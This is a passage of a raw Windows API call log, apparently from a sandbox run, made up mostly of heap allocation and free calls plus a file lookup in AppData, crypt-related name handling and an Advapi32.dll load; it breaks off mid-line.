1 [0241.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0241.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0241.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0241.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0241.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0241.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0241.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c98 [0241.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0241.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0241.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0241.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0241.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0241.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0241.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0241.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0241.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0241.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0241.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0241.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0241.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0241.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa30 [0241.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0241.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0241.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa58 [0241.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0241.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0241.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0241.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04508 [0241.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0241.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0241.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa80 [0241.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0241.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0241.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0241.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f968 [0241.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0241.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0241.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f990 [0241.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0241.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0241.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0241.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0241.918] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0241.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0241.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0241.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0241.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0241.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8c8 [0241.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0241.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0241.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0241.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0241.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0241.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7faa8 [0241.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0241.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0241.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0241.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0241.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8a0 [0241.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0241.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0241.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0241.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f9b8 [0241.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0241.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0241.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7faa8 | out: hHeap=0x970000) returned 1 [0241.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0241.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0241.919] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0241.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0241.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0241.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0241.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0241.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f918 [0241.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0241.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0241.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0241.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0241.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0241.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0241.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0241.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0241.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0241.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0241.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0241.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0241.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0241.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f850 [0241.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0241.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0241.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0241.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0241.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0241.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0241.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0241.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0241.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0241.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0241.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0241.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0241.920] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0241.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0241.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0241.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f878 [0241.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0241.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0241.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0241.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f940 [0241.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0241.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0241.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0241.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7faf8 [0241.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0241.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0241.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f878 | out: hHeap=0x970000) returned 1 [0241.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0241.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0241.921] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0241.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0241.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0241.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fad0 [0241.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0241.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0241.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0241.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f9e0 [0241.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0241.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0241.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0241.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8f0 [0241.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0241.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0241.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0241.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0241.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0241.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0241.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0241.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0241.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0241.922] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/ZTd7YZt.xlsx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe917aad0, ftCreationTime.dwHighDateTime=0x1d5ef67, ftLastAccessTime.dwLowDateTime=0xf6bc5750, ftLastAccessTime.dwHighDateTime=0x1d5ecbd, ftLastWriteTime.dwLowDateTime=0xf6bc5750, ftLastWriteTime.dwHighDateTime=0x1d5ecbd, nFileSizeHigh=0x0, nFileSizeLow=0xc394, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="ZTd7YZt.xlsx", cAlternateFileName="ZTD7YZ~1.XLS")) returned 0xa87250 [0241.922] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0241.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0241.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0241.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0241.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0241.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0241.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0241.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0241.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fad0 | out: hHeap=0x970000) returned 1 [0241.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0241.923] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0241.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0241.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0241.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0241.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0241.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa08 [0241.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0241.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0241.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0241.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0241.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0241.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0241.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0241.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0241.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0241.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0241.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0241.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0241.923] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7faa8 [0241.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0241.923] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0241.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7faa8 | out: hHeap=0x970000) returned 1 [0241.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0241.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50dd0 [0241.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0241.923] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0241.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04038 [0241.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0241.924] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0241.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04038 | out: hHeap=0x970000) returned 1 [0241.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0241.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0241.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0241.924] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0241.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0241.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0241.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0241.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0241.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0241.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0241.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0241.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0241.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0241.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0241.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0241.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0241.924] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0241.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0241.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0241.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7faa8 [0241.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0241.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0241.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0241.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f878 [0241.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0241.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0241.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0241.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fad0 [0241.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0241.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0241.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0241.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0241.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0241.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0241.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0241.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0241.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0241.925] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0241.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0241.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0241.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0241.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0241.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0241.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0241.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0241.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7faa8 | out: hHeap=0x970000) returned 1 [0241.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0241.926] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0241.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0241.926] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0241.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0241.926] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0241.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 